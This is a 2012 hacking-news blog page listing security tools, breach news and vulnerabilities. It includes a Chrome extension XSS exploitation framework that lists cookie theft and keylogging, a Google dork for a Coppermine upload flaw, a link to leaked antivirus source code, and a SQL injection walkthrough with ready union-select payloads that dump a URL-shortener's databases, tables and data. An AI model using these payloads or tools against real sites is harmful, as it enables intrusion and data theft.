Tuesday, 13. March 2012
XSS ChEF - Exploitation Framework
This is a Chrome Extension Exploitation Framework - think BeEF for Chrome extensions. Whenever you encounter a XSS vulnerability in Chrome extension, ChEF will ease the exploitation.

What can you actually do:

Monitor open tabs of victims
Execute JS on every tab (global XSS)
Extract HTML, read/write cookies (also httpOnly), localStorage
Get and manipulate browser history
Stay persistent until whole browser is closed (or even futher if you can persist in extensions' localStorage)
Make screenshot of victims window
Further exploit e.g. via attaching BeEF hooks, keyloggers etc.
Explore filesystem through file:// protocol
Bypass Chrome extensions content script sandbox to interact directly with page JS

Download
https://github.com/koto/xsschef

Permalink

 


FBI says $700,000 worth of unauthorized charges made by Anonymous
Back in December of last year when Anonymous hacked into security think tank Stratfor, one of its claims was the theft of 200GB worth of data, including e-mails and client credit information.

Now, the FBI saying that between December 6, 2011 in February 2012, “at least $700,000 worth of unauthorized charges were made to credit card accounts that were among those stolen during the hack”.

Permalink

 


ClubHack Magazine Issue 26, March 2012
This issue covers following articles:-

0x00 Tech Gyan - Network Security
0x01 Tool Gyan - Who wants to be a Millionaire
0x02 Mom's Guide - Protect your privacy online with ’TOR’
0x03 Legal Gyan - Section 66A - Sending offensive or false messages
0x04 Matriux Vibhag - EtherApe – Graphical Network Monitoring
0x05 Poster

Download PDF
http://chmag.in/issue/mar2012.pdf

Permalink

 


Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
Google dork: “Powered by Coppermine Photo Gallery”

POC: http://[localhost]/Patch/upload.php

File:
jpg, xlx, txt, bmp, doc, mp4, etc

by
fikri-badboy

Permalink

 


Fake Access Point generator


Download
http://www.mediafire.com/?49wcc4536sviksq

Permalink

 


Chrome hacker wins $60,000
Less than two weeks after Google launched Pwnium, a competition for hackers to find security exploits in Chrome, the search giant has announced its first winner.

The winner, Sergey Glazunov, was the first to submit an entry in Google's Pwniumcompetition to find security exploits in Chrome.

Info
https://plus.google.com/u/0/116651741222993143554/posts/5Eq5d9XgFqs

Permalink

 


OWASP Mantra - URL Shortener Script - SQL


URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/

SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...

Exploit-DB URL: http://www.exploit-db.com/exploits/17937/

Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --

Permalink

 


Vanguard - Penetration testing tool - Linux
Vanguard is a comprehensive web penetration testing tool written in Perl that identifies vulnerabilities in web applications. It is an another addition in open source web penetration testing community.
Web penetration tests:

SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection


Download
http://www.blackhatacademy.org/releases/vanguard-public.tgz

Permalink

 


Saturday, 10. March 2012
Bugtraq System - Penetration Distro GNU/Linux
Bugtraq is a distribution based on the 2.6.38 kernel has a wide range of penetration and forensic tools. Bugtraq can install from a Live DVD or USB drive, the distribution is customized to the last package, configured and updated the kernel and the kernel has been patched for better performance and to recognize a variety of hardware, including wireless injection patches pentesting other distributions do not recognize.
Some of the special features that you can appreciate are:
Administrative improvements of the system for better management of services.
Expanded the range of recognition for injection wireless drivers.
Patching the kernel 2.6.38 to recognize 4 gigs of RAM in 32-bit.
Tools perfectly configured, automated installation scripts and tools like Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc...
Unique Scripts from Bugtraq-Team (SVN updates tools, delete tracks, backdoors, Spyder-sql, etc.)
Stability and performance optimized: Enhanced performance flash and java and start purging unnecessary services. So that the user can use only the services you really want.
It has incorporated the creation of the user in the installation, which is created with all system configurations.
We are the distribution and Forensic Pentesting with more tools built and functional, well organized menu without repetition of the same to avoid overwhelming the user.

Download
http://bugtraq-team.com/index.php/en/descargas-2

Permalink

 


Friday, 9. March 2012
ZetaBoards - XSS



by
st2tea
Sony

Permalink

 


Symantec Norton AntiVirus 2006 All Platform Source Code
Typ:
Porno > Sonstiges
Dateien:
1
Größe:
1.07 GiB (1147711544 Bytes)
Tag(s):
Anonymous AntiSec LuLzSec
Qualität:
+5 / -0 (+5)
Hochgeladen:
2012-03-08 17:05:55 GMT
By:
Anonymous

Info Hash:
B1DEC26B69A7DD191451C29BCE83B74633293CE4

Download
http://thepiratebay.se/torrent/7087027/

Permalink

 


Thursday, 8. March 2012
Adobe Flash Player .mp4 'cprt' Overflow
This vulnerability has been exploited in the wild as part of the
"Iran's Oil and Nuclear Situation.doc" phishing campaign.

Info
http://pastebin.com/ebvsLGBF

Permalink